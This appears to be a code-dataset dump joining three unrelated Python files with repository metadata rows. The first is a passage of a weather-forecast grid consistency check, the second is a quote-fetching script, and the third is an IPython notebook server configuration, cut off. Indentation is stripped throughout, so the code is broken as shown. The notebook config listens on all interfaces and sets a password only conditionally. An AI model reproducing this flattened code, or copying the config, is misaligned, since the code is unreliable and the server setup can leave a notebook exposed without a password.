qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', timeRange)
if [] == qpfInfoList:
message = 'There are no QPF grids in the time range you selected.\nThe QPF/PoP Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
for qpfIndex, qpfGrid in enumerate(self.getGrids(
'Fcst', 'QPF', 'SFC', timeRange, mode='List', noDataError=0,
cache=0)):
qpfNonZeroMask = greater(qpfGrid, qpfTol)
gridTR = qpfInfoList[qpfIndex].gridTime()
wxInfoList = self.getGridInfo('Fcst', 'Wx', 'SFC', gridTR)
if [] == wxInfoList:
message = '''There are no Wx grids in time range %s.
The QPF/Wx Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
# There are two cases. If the QPF grid is exactly 6 hours long and
# starts at 00, 06, 12, or 18 UTC, then only one of the
# corresponding Wx grids needs to be consistent. Otherwise, all the
# corresponding Wx grids need to be consistent.
if gridTR.duration() / 3600 == 6 and gridTR.startTime().hour in (0, 6, 12, 18):
self._qpfWxCheckLocked(qpfNonZeroMask, gridTR, wxInfoList)
else:
self._qpfWxCheckUnlocked(qpfNonZeroMask, gridTR, wxInfoList)
return
def _qpfWxCheckLocked(self, qpfNonZeroMask, gridTR, wxInfoList):
# The "Locked" comes from the idea that if the QPF grid is
# exactly 6 hours long and starts at 00, 06, 12, or 18 UTC, then it
# is "locked".
consistMaskList = []
for wxIndex, wxGrid in enumerate(self.getGrids(
'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
cache=0)):
# wxMask is from SmartScript
sMask = self.wxMask(wxGrid, ':S:')
swMask = self.wxMask(wxGrid, ':SW:')
ipMask = self.wxMask(wxGrid, ':IP:')
snowMask = logical_or(logical_or(sMask, swMask), ipMask)
del (sMask, swMask, ipMask)
rMask = self.wxMask(wxGrid, ':R:')
rwMask = self.wxMask(wxGrid, ':RW:')
lMask = self.wxMask(wxGrid, ':L:')
zlMask = self.wxMask(wxGrid, ':ZL:')
zrMask = self.wxMask(wxGrid, ':ZR:')
# logical_or is from Numeric
rainMask = logical_or(
rMask, logical_or(
rwMask, logical_or(
lMask, logical_or(zlMask, zrMask))))
del (rMask, rwMask, lMask, zlMask, zrMask)
precipMask = logical_or(snowMask, rainMask)
del (snowMask, rainMask)
wxMask = logical_not(precipMask)
# QPF >= 0.01, 1; QPF < 0.01, 0
# Wx has precip, 0; Wx doesn't have precip, 1
# QPF >= 0.01 (1) and Wx has (0) = 0 (Good result)
# QPF >= 0.01 (1) and Wx doesn't have (1) = 1 (Bad result)
# QPF < 0.01 (0) and Wx has (0) = 0 (Good result)
# QPF < 0.01 (0) and Wx doesn't have (1) = 0 (Good result)
consistMask = logical_and(qpfNonZeroMask, wxMask)
consistMask[logical_not(self.cwaMask)] = 0
consistMaskList.append(consistMask)
if not sometrue(ravel(consistMask)):
# There were no inconsistencies with this Wx grid. Since only
# one needs to be consistent, we don't need to do any more
# checks.
break
else:
# This block will only execute if the for loop runs to
# completion, i.e., the break statement is not executed.
# So, if we get here, we have an inconsistency and need to
# highlight the appropriate grids.
if inconGridColor:
self.highlightGrids(
'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'Wx', 'SFC', gridTR, inconGridColor)
# createGrid is from SmartScript
for index in xrange(len(wxInfoList)):
# Create temporary grids for each Wx grid. Limit the time
# range of the temporary grid so that it doesn't start any
# earlier or any later than the corresponding QPF grid.
wxGridTR = wxInfoList[index].gridTime()
tempGridStartTime = wxGridTR.startTime().unixTime()
if tempGridStartTime < gridTR.startTime().unixTime():
tempGridStartTime = gridTR.startTime().unixTime()
tempGridEndTime = wxGridTR.endTime().unixTime()
if tempGridEndTime > gridTR.endTime().unixTime():
tempGridEndTime = gridTR.endTime().unixTime()
tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
offset = (tempGridStartTime - \
self.timeRange0_1.startTime().unixTime()) / 3600
# Since the temporary grid could have a different time range
# than the Wx grid, I need to create and use that time range
# when creating the temporary grid.
tempGridTR = self.createTimeRange(
offset, offset+tempGridDur, 'Zulu')
self.createGrid(
'Fcst', 'QPFWxInconsistent', 'SCALAR',
consistMaskList[index], tempGridTR,
descriptiveName='QPFWxInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'QPFWxInconsistent', 'SFC', gridTR,
tempGridColor)
self.inconsistent = True
return
def _qpfWxCheckUnlocked(self, qpfNonZeroMask, gridTR, wxInfoList):
# The "Unlocked" comes from the idea that if the QPF grid is not
# exactly 6 hours long and starting at 00, 06, 12, or 18 UTC, then it
# is "unlocked".
for wxIndex, wxGrid in enumerate(self.getGrids(
'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
cache=0)):
# wxMask is from SmartScript
sMask = self.wxMask(wxGrid, ':S:')
swMask = self.wxMask(wxGrid, ':SW:')
ipMask = self.wxMask(wxGrid, ':IP:')
snowMask = logical_or(logical_or(sMask, swMask), ipMask)
del (sMask, swMask, ipMask)
rMask = self.wxMask(wxGrid, ':R:')
rwMask = self.wxMask(wxGrid, ':RW:')
lMask = self.wxMask(wxGrid, ':L:')
zlMask = self.wxMask(wxGrid, ':ZL:')
zrMask = self.wxMask(wxGrid, ':ZR:')
# logical_or is from Numeric
rainMask = logical_or(
rMask, logical_or(
rwMask, logical_or(
lMask, logical_or(zlMask, zrMask))))
del (rMask, rwMask, lMask, zlMask, zrMask)
precipMask = logical_or(snowMask, rainMask)
del (snowMask, rainMask)
wxMask = logical_not(precipMask)
# QPF >= 0.01, 1; QPF < 0.01, 0
# Wx has precip, 0; Wx doesn't have precip, 1
# QPF >= 0.01 (1) and Wx has (0) = 0 (Good result)
# QPF >= 0.01 (1) and Wx doesn't have (1) = 1 (Bad result)
# QPF < 0.01 (0) and Wx has (0) = 0 (Good result)
# QPF < 0.01 (0) and Wx doesn't have (1) = 0 (Good result)
#
# All Wx grids overlapping the SnowAmt grid must be consistent.
consistMask = logical_and(qpfNonZeroMask, wxMask)
consistMask[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask)):
wxGridTR = wxInfoList[wxIndex].gridTime()
tempGridStartTime = wxGridTR.startTime().unixTime()
if tempGridStartTime < gridTR.startTime().unixTime():
# Clip to start of QPF grid
tempGridStartTime = gridTR.startTime().unixTime()
tempGridEndTime = wxGridTR.endTime().unixTime()
if tempGridEndTime > gridTR.endTime().unixTime():
# Clip to end of QPF Grid
tempGridEndTime = gridTR.endTime().unixTime()
tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
offset = (tempGridStartTime - \
self.timeRange0_1.startTime().unixTime()) / 3600
# Since either the front or end of the Wx grid's
# time range may have been clipped, create a time
# range using those values.
tempGridTR = self.createTimeRange(
offset, offset+tempGridDur, 'Zulu')
self.createGrid(
'Fcst', 'QPFWxInconsistent', 'SCALAR', consistMask,
tempGridTR, descriptiveName='QPFWxInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'QPFWxInconsistent', 'SFC', gridTR,
tempGridColor)
if inconGridColor:
self.highlightGrids(
'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'Wx', 'SFC', wxGridTR, inconGridColor)
self.inconsistent = True
return
def _calcTolerance(self, gridInfo):
precision = gridInfo.gridParmInfo.getPrecision()
return pow(10, -precision)
def execute(self, timeRange, varDict):
# Make sure the configuration values are the correct types.
self.__checkConfigValueTypes()
# createTimeRange is from SmartScript
timeRange0_240 = self.createTimeRange(0, 241, 'Zulu')
checkCleanup = varDict.get('Check_Cleanup', 'Check')
self.__cleanup(timeRange0_240)
if checkCleanup == 'Cleanup':
message = 'SnowQPFPoPWxCheck complete.'
self.statusBarMsg(message, 'R')
self.cancel()
if timeRange.endTime().unixTime() - timeRange.startTime().unixTime() < \
3600: # No time range selected, use create a 0 to 240 hour range
timeRange = timeRange0_240
# If the user has a time range swept out, send an informational
# message.
if (timeRange.startTime().unixTime() != timeRange0_240.startTime().unixTime()) or \
(timeRange.endTime().unixTime() != timeRange0_240.endTime().unixTime()) or \
(timeRange.duration() != timeRange0_240.duration()):
message = 'The SnowAmtQPFPoPWxCheck procedure did not run over the 0 to 240 hour time period,\nit ran over %s. This may be what you desired.' % str(timeRange)
self.statusBarMsg(message, 'S')
# I'll need to know the unix time of 00Z so I can determine the
# start time of temporary grids later. I'll need this in more than
# one of the methods called later, so this will become an instance
# variable, i.e., prefixed with "self." I also need an instance
# variable that flags whether or not there were inconsistent grids.
self.timeRange0_1 = self.createTimeRange(0, 1, 'Zulu')
self.inconsistent = False
# A CWA edit area can be provided in the configuration section.
# Attempt to encode that edit area as a Numeric Python mask so that
# the later checks are limited to the edit area. The GFE is not very
# friendly if the encoding fails. The GFE will send a nasty message
# to the user, but continue executing the procedure. No trappable
# error is thrown. As of this writing, the GFE appears to create an
# array of shape (0, 0) if the encoding cannot be done, so I will
# check for that and, if I find it, then set the edit area to the
# domain.
# encodeEditArea comes from SmartScript. For the points that are in
# the edit area, a value of one is assigned. Otherwise, a value of
# zero is assigned.
if cwaEditArea:
self.cwaMask = self.encodeEditArea(cwaEditArea)
if self.cwaMask.shape == (0, 0):
# Use the getGridInfo command to get information about the
# SnowAmt grid. From this, the grid size can be extracted. I
# could use getGridInfo on any valid GFE grid.
# getGridInfo is from SmartScript
snowAmtInfoList = self.getGridInfo(
'Fcst', 'SnowAmt', 'SFC', timeRange)
# I painfully discovered that the array shape is (y, x)
gridSize = (snowAmtInfoList[0].gridLocation().gridSize().y,
snowAmtInfoList[0].gridLocation().gridSize().x)
# ones is from Numeric. It creates an array of the given size
# and data type where all values are one.
self.cwaMask = ones(gridSize, Int)
message = \
'''The procedure was not able to use the CWA edit area, %s, provided
in the configuration. You should inform the person responsible for procedures
of this problem. The procedure ran over the whole domain.''' % cwaEditArea
self.statusBarMsg(message, 'S')
else:
snowAmtInfoList = self.getGridInfo(
'Fcst', 'SnowAmt', 'SFC', timeRange)
gridSize = (snowAmtInfoList[0].gridLocation().gridSize().y,
snowAmtInfoList[0].gridLocation().gridSize().x)
self.cwaMask = ones(gridSize, Int)
# Based on the user's input, run the appropriate checks.
# By making each of these options a checkbox with only one option in
# the VariableList above, if an option is unchecked then an empty
# list, [], will be what's in varDict. If an option is checked then a
# list with the value "Yes", ["Yes"], will be what's in varDict. In
# Python, a conditional expression can be whether or not a data
# structure is empty. In these cases, an empty data structure,
# e.g., an empty list, an empty tuple, an empty dictionary,
# conditionally test to False while non empty data structures
# conditionally test to True. In the if statements below, every varDict
# lookup returns a list: either [] or ["Yes"]. I think the constructs
# below or more elegant and easier to understand.
if varDict['Run SnowAmt/QPF Check?']:
# Call the SnowAmt/QPF check method
self._runSnowAmtQPFCheck(timeRange)
if varDict['Run SnowAmt/Wx Check?']:
# Call the SnowAmt/Wx check method
self._runSnowAmtWxCheck(timeRange)
if varDict['Run QPF/PoP Check?']:
# Call the QPF/PoP check method
self._runQPFPoPCheck(timeRange)
if varDict['Run QPF/Wx Check?']:
# Call the QPF/Wx check method
self._runQPFWxCheck(timeRange)
message = 'SnowAmtQPFPoPWxCheck complete.'
if self.inconsistent:
message = '%s Inconsistencies found! Grids highlighted %s and %s.' % (
message, inconGridColor, tempGridColor)
self.statusBarMsg(message, 'S')
else:
self.statusBarMsg(message, 'R')
| [
"mjames@unidata.ucar.edu"
] | mjames@unidata.ucar.edu |
74dbb2d761f0933956fd053d1d298ae037799303 | 991ef9b36fbe85f7d611124f4059ac3715039640 | /fetch.py | 260de0ea4e63f1c1a81eb4325276617d10398ff6 | [] | no_license | zeddo123/Quotefetch | 7c435d2beaf448c0c6135b10154a6a9d637b7dc6 | df74ab397413ce728792564392b020bd84275923 | refs/heads/master | 2021-07-05T21:36:37.872916 | 2020-09-01T09:20:58 | 2020-09-01T09:20:58 | 172,564,321 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | #!/usr/bin/env python3
from utils import *
line_len = 8 #The maximum number of words in one line
text_color = '' # The Color of the quote (Default : White)
type_of_quote = '“”' # '«»'
quote_color = '1;33' # The color of the quote " ' "
file_name = 'quote.txt'
url = 'https://www.quotedb.com/quote/quote.php?action=random_quote'
try:
raw = get_content(url).decode()
except:
print('Connection Error')
exit()
quote = remove_web(raw)
content = quote[0]
author = quote[1]
words = content.split(' ')
lines = create_lines(words,line_len)
format_str(lines)
lines = [i + '\n' for i in lines] #adding return charcater to every line
with open(file_name,'w') as file:
file.write(f'\033[{quote_color}m{type_of_quote[0]} \033[{text_color}m')
for line in lines:
file.write(line)
file.write(f'{(len(max(lines))-len(author))* " "} \033[{quote_color}m{type_of_quote[1]}\033[{text_color}m {author}\n')
| [
"mouhadrissi9@gmail.com"
] | mouhadrissi9@gmail.com |
3c8c459ca3da25ea02f13f4269af68969c2b9943 | a2793ecc10f3a683ab6fbe045b71c78b1cafb7b8 | /ipython/profile_flowml_server/ipython_notebook_config.py | dab5cffdb3374ff141c6f36893c7dcc2cfa49d67 | [] | no_license | jeffrey-hokanson/FlowML | 4e67cba1f1ade0485824aa702fa872f645791562 | 878f318bdde53365f1b2f75725376bdbd4485f7e | refs/heads/master | 2021-01-22T13:42:54.142314 | 2015-01-29T00:31:36 | 2015-01-29T00:31:36 | 21,365,669 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,593 | py | # Configuration file for ipython-notebook.
c = get_config()
c.IPKernelApp.pylab = 'inline'
# TODO: This should be passed in by the start_server.sh script
root = u'/Users/jhokanson/SVN/FlowML/'
# This should be an absolute path so that when
c.NotebookApp.certfile = root + u'mycert.pem'
c.NotebookApp.ip = '*'
c.NotebookApp.open_browser = False
c.NotebookApp.port = 9000
# Save password in independent file
f = open(root + u'password.sha1')
password = f.readline()
f.close()
if password[0:4] == u'sha1':
c.NotebookApp.password = password[0:58]
#------------------------------------------------------------------------------
# NotebookApp configuration
#------------------------------------------------------------------------------
# NotebookApp will inherit config from: BaseIPythonApplication, Application
# The url for MathJax.js.
# c.NotebookApp.mathjax_url = ''
# Supply extra arguments that will be passed to Jinja environment.
# c.NotebookApp.jinja_environment_options = {}
# The IP address the notebook server will listen on.
# c.NotebookApp.ip = 'localhost'
# DEPRECATED use base_url
# c.NotebookApp.base_project_url = '/'
# Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.NotebookApp.verbose_crash = False
# The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
# c.NotebookApp.cookie_secret = ''
# The number of additional ports to try if the specified port is not available.
# c.NotebookApp.port_retries = 50
# Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
# c.NotebookApp.open_browser = True
# The notebook manager class to use.
# c.NotebookApp.notebook_manager_class = 'IPython.html.services.notebooks.filenbmanager.FileNotebookManager'
# The date format used by logging formatters for %(asctime)s
# c.NotebookApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
# The port the notebook server will listen on.
# c.NotebookApp.port = 8888
# Whether to overwrite existing config files when copying
# c.NotebookApp.overwrite = False
# Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library IPython uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
# c.NotebookApp.enable_mathjax = True
# The full path to an SSL/TLS certificate file.
# c.NotebookApp.certfile = u''
# The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
# c.NotebookApp.base_url = '/'
# The directory to use for notebooks and kernels.
# c.NotebookApp.notebook_dir = u'/Users/jhokanson/SVN/FlowML'
#
# c.NotebookApp.file_to_run = ''
# The IPython profile to use.
# c.NotebookApp.profile = u'default'
# paths for Javascript extensions. By default, this is just
# IPYTHONDIR/nbextensions
# c.NotebookApp.nbextensions_path = []
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHONDIR.
# c.NotebookApp.ipython_dir = u''
# Set the log level by value or name.
# c.NotebookApp.log_level = 30
# Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from IPython.lib import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
# c.NotebookApp.password = u''
# The Logging format template
# c.NotebookApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
# Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# c.NotebookApp.extra_config_file = u''
# Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
# c.NotebookApp.extra_static_paths = []
# Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
# c.NotebookApp.trust_xheaders = False
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.NotebookApp.copy_config_files = False
# The full path to a private key file for usage with SSL/TLS.
# c.NotebookApp.keyfile = u''
# Supply overrides for the tornado.web.Application that the IPython notebook
# uses.
# c.NotebookApp.webapp_settings = {}
# Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the `webbrowser`
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
# c.NotebookApp.browser = u''
#------------------------------------------------------------------------------
# IPKernelApp configuration
#------------------------------------------------------------------------------
# IPython: an enhanced interactive Python shell.
# IPKernelApp will inherit config from: BaseIPythonApplication, Application,
# InteractiveShellApp
# Run the file referenced by the PYTHONSTARTUP environment variable at IPython
# startup.
# c.IPKernelApp.exec_PYTHONSTARTUP = True
# The importstring for the DisplayHook factory
# c.IPKernelApp.displayhook_class = 'IPython.kernel.zmq.displayhook.ZMQDisplayHook'
# Set the IP or interface on which the kernel will listen.
# c.IPKernelApp.ip = u''
# Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# c.IPKernelApp.pylab = None
# Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.IPKernelApp.verbose_crash = False
# The Kernel subclass to be used.
#
# This should allow easy re-use of the IPKernelApp entry point to configure and
# launch kernels other than IPython's own.
# c.IPKernelApp.kernel_class = 'IPython.kernel.zmq.ipkernel.Kernel'
# Run the module as a script.
# c.IPKernelApp.module_to_run = ''
# The date format used by logging formatters for %(asctime)s
# c.IPKernelApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
# set the shell (ROUTER) port [default: random]
# c.IPKernelApp.shell_port = 0
# set the control (ROUTER) port [default: random]
# c.IPKernelApp.control_port = 0
# Whether to overwrite existing config files when copying
# c.IPKernelApp.overwrite = False
# Execute the given command string.
# c.IPKernelApp.code_to_run = ''
# set the stdin (ROUTER) port [default: random]
# c.IPKernelApp.stdin_port = 0
# Set the log level by value or name.
# c.IPKernelApp.log_level = 30
# lines of code to run at IPython startup.
# c.IPKernelApp.exec_lines = []
# Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# c.IPKernelApp.extra_config_file = u''
# The importstring for the OutStream factory
# c.IPKernelApp.outstream_class = 'IPython.kernel.zmq.iostream.OutStream'
# Whether to create profile dir if it doesn't exist
# c.IPKernelApp.auto_create = False
# set the heartbeat port [default: random]
# c.IPKernelApp.hb_port = 0
#
# c.IPKernelApp.transport = 'tcp'
# redirect stdout to the null device
# c.IPKernelApp.no_stdout = False
# Should variables loaded at startup (by startup files, exec_lines, etc.) be
# hidden from tools like %who?
# c.IPKernelApp.hide_initial_ns = True
# dotted module name of an IPython extension to load.
# c.IPKernelApp.extra_extension = ''
# A file to be run
# c.IPKernelApp.file_to_run = ''
# The IPython profile to use.
# c.IPKernelApp.profile = u'default'
#
# c.IPKernelApp.parent_appname = u''
# kill this process if its parent dies. On Windows, the argument specifies the
# HANDLE of the parent process, otherwise it is simply boolean.
# c.IPKernelApp.parent_handle = 0
# JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
# c.IPKernelApp.connection_file = ''
# If true, IPython will populate the user namespace with numpy, pylab, etc. and
# an ``import *`` is done from numpy and pylab, when using pylab mode.
#
# When False, pylab mode should not import any names into the user namespace.
# c.IPKernelApp.pylab_import_all = True
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHONDIR.
# c.IPKernelApp.ipython_dir = u''
# Configure matplotlib for interactive use with the default matplotlib backend.
# c.IPKernelApp.matplotlib = None
# ONLY USED ON WINDOWS Interrupt this process when the parent is signaled.
# c.IPKernelApp.interrupt = 0
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.IPKernelApp.copy_config_files = False
# List of files to run at IPython startup.
# c.IPKernelApp.exec_files = []
# Enable GUI event loop integration with any of ('glut', 'gtk', 'gtk3', 'none',
# 'osx', 'pyglet', 'qt', 'qt4', 'tk', 'wx').
# c.IPKernelApp.gui = None
# A list of dotted module names of IPython extensions to load.
# c.IPKernelApp.extensions = []
# redirect stderr to the null device
# c.IPKernelApp.no_stderr = False
# The Logging format template
# c.IPKernelApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
# set the iopub (PUB) port [default: random]
# c.IPKernelApp.iopub_port = 0
#------------------------------------------------------------------------------
# ZMQInteractiveShell configuration
#------------------------------------------------------------------------------
# A subclass of InteractiveShell for ZMQ.
# ZMQInteractiveShell will inherit config from: InteractiveShell
# Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# c.ZMQInteractiveShell.color_info = True
# A list of ast.NodeTransformer subclass instances, which will be applied to
# user input before code is run.
# c.ZMQInteractiveShell.ast_transformers = []
#
# c.ZMQInteractiveShell.history_length = 10000
# Don't call post-execute functions that have failed in the past.
# c.ZMQInteractiveShell.disable_failing_post_execute = False
# Show rewritten input, e.g. for autocall.
# c.ZMQInteractiveShell.show_rewritten_input = True
# Set the color scheme (NoColor, Linux, or LightBG).
# c.ZMQInteractiveShell.colors = 'LightBG'
#
# c.ZMQInteractiveShell.separate_in = '\n'
# Deprecated, use PromptManager.in2_template
# c.ZMQInteractiveShell.prompt_in2 = ' .\\D.: '
#
# c.ZMQInteractiveShell.separate_out = ''
# Deprecated, use PromptManager.in_template
# c.ZMQInteractiveShell.prompt_in1 = 'In [\\#]: '
# Enable deep (recursive) reloading by default. IPython can use the deep_reload
# module which reloads changes in modules recursively (it replaces the reload()
# function, so you don't need to change anything to use it). deep_reload()
# forces a full reload of modules whose code may have changed, which the default
# reload() function does not. When deep_reload is off, IPython will use the
# normal reload(), but deep_reload will still be available as dreload().
# c.ZMQInteractiveShell.deep_reload = False
# Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# c.ZMQInteractiveShell.autocall = 0
#
# c.ZMQInteractiveShell.separate_out2 = ''
# Deprecated, use PromptManager.justify
# c.ZMQInteractiveShell.prompts_pad_left = True
#
# c.ZMQInteractiveShell.readline_parse_and_bind = ['tab: complete', '"\\C-l": clear-screen', 'set show-all-if-ambiguous on', '"\\C-o": tab-insert', '"\\C-r": reverse-search-history', '"\\C-s": forward-search-history', '"\\C-p": history-search-backward', '"\\C-n": history-search-forward', '"\\e[A": history-search-backward', '"\\e[B": history-search-forward', '"\\C-k": kill-line', '"\\C-u": unix-line-discard']
# Enable magic commands to be called without the leading %.
# c.ZMQInteractiveShell.automagic = True
#
# c.ZMQInteractiveShell.debug = False
#
# c.ZMQInteractiveShell.object_info_string_level = 0
#
# c.ZMQInteractiveShell.ipython_dir = ''
#
# c.ZMQInteractiveShell.readline_remove_delims = '-/~'
# Start logging to the default log file.
# c.ZMQInteractiveShell.logstart = False
# The name of the logfile to use.
# c.ZMQInteractiveShell.logfile = ''
#
# c.ZMQInteractiveShell.wildcards_case_sensitive = True
# Save multi-line entries as one entry in readline history
# c.ZMQInteractiveShell.multiline_history = True
# Start logging to the given file in append mode.
# c.ZMQInteractiveShell.logappend = ''
#
# c.ZMQInteractiveShell.xmode = 'Context'
#
# c.ZMQInteractiveShell.quiet = False
# Deprecated, use PromptManager.out_template
# c.ZMQInteractiveShell.prompt_out = 'Out[\\#]: '
# Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 20 (if you provide a value
# less than 20, it is reset to 0 and a warning is issued). This limit is
# defined because otherwise you'll spend more time re-flushing a too small cache
# than working
# c.ZMQInteractiveShell.cache_size = 1000
# 'all', 'last', 'last_expr' or 'none', specifying which nodes should be run
# interactively (displaying output from expressions).
# c.ZMQInteractiveShell.ast_node_interactivity = 'last_expr'
# Automatically call the pdb debugger after every exception.
# c.ZMQInteractiveShell.pdb = False
#------------------------------------------------------------------------------
# KernelManager configuration
#------------------------------------------------------------------------------
# Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
# KernelManager will inherit config from: ConnectionFileMixin
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, IPython does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the IPython command
# line.
# c.KernelManager.kernel_cmd = []
# Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
# c.KernelManager.ip = u''
#
# c.KernelManager.transport = 'tcp'
# Should we autorestart the kernel if it dies.
# c.KernelManager.autorestart = False
#------------------------------------------------------------------------------
# ProfileDir configuration
#------------------------------------------------------------------------------
# An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
# Set the profile location directly. This overrides the logic used by the
# `profile` option.
# c.ProfileDir.location = u''
#------------------------------------------------------------------------------
# Session configuration
#------------------------------------------------------------------------------
# Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialiization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
# Username for the Session. Default is your system username.
# c.Session.username = u'jhokanson'
# The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
# c.Session.unpacker = 'json'
# Threshold (in bytes) beyond which a buffer should be sent without copying.
# c.Session.copy_threshold = 65536
# The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
# c.Session.packer = 'json'
# The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
# c.Session.digest_history_size = 65536
# The UUID identifying this session.
# c.Session.session = u''
# The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
# c.Session.signature_scheme = 'hmac-sha256'
# execution key, for extra authentication.
# c.Session.key = ''
# Debug output in the Session
# c.Session.debug = False
# The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
# c.Session.item_threshold = 64
# path to file containing execution key.
# c.Session.keyfile = ''
# Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
# c.Session.buffer_threshold = 1024
# Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
# c.Session.metadata = {}
#------------------------------------------------------------------------------
# InlineBackend configuration
#------------------------------------------------------------------------------
# An object to store configuration of the inline backend.
# The figure format to enable (deprecated use `figure_formats` instead)
# c.InlineBackend.figure_format = u''
# A set of figure formats to enable: 'png', 'retina', 'jpeg', 'svg', 'pdf'.
# c.InlineBackend.figure_formats = set(['png'])
# Extra kwargs to be passed to fig.canvas.print_figure.
#
# Logical examples include: bbox_inches, quality (for jpeg figures), etc.
# c.InlineBackend.print_figure_kwargs = {'bbox_inches': 'tight'}
# Close all figures at the end of each cell.
#
# When True, ensures that each cell starts with no active figures, but it also
# means that one must keep track of references in order to edit or redraw
# figures in subsequent cells. This mode is ideal for the notebook, where
# residual plots from other cells might be surprising.
#
# When False, one must call figure() to create new figures. This means that
# gcf() and getfigs() can reference figures created in other cells, and the
# active figure can continue to be edited with pylab/pyplot methods that
